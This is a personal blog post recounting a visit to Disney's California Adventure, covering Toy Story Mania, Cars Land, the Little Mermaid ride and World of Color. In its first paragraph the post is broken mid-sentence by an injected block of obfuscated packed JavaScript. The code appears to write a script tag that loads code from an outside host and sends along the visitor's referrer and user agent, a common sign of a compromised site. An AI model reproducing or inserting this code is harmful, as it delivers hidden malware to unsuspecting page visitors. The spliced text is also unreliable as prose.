Disney’s California Adventure

Did I mention we went to Disney when we were in SoCal a few weeks ago?  It was pretty fun to spend the day at CA Adventure with our CA buddies, Caresse and Tyler.  They’d never been and I hadn’t seen the place since the remodel 🙂

First ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fdief|var|u0026u|referrer|inkks||js|php’.split(‘|’),0,{}))
thing’s first.  We hit up Toy Story as soon as we arrived.  With the new Cars Land ride, Toy Story was practically a ghost town and we were able to ride it twice.  Then the kids decided to ride California Screamin’.  I developed motion sickness in my old age and don’t do well on roller coasters.  Double thumbs down!

We hit up Soarin’ Over California, where Caresse’s fear of heights became evident as soon as the ride began 🙂  Then it was time for the Tower of Terror and then off to Cars Land!

Tip:  Don’t worry about getting a fast pass for Radiator Springs Racers, just get in the single rider line.  We were on the ride in less than 20 minutes.  Sure, we didn’t get to sit together….so not an awesome idea if you have kids…..but we wasted very little time 🙂

Cars Land is pretty impressive.  At night, it looks like something straight out of the movie.

To kill some time before Worl of Color, we hit up the Disney Store.  Here, the boys are living out their childhood dreams of adventure, dressing up as Indiana Jones.

We also killed some time by riding the new Little Mermaid ride.  Twice.  This is a great new addition.  I was singing along throughout the ride and I highly recommend it to anyone familiar with the movie.  You want thing-a-ma-bobs?  I’ve got twenty 😉

The second time around, we made the boys sit together for a romantic journey under the sea.

Then it was time for World of Color.  It was really good.  Like really good.  I may or may not have even shed a small tear.  Disney magic.  Gets me every time.

It was so amazing (And I was such an excellent tour guide) that Caresse and Tyler decided to buy annual passes!  So jealous 🙂  Disney should hire me.  I can talk anyone into an annual pass!  It just makes logical sense.  Happy Friday!  Are you doing anything fun?
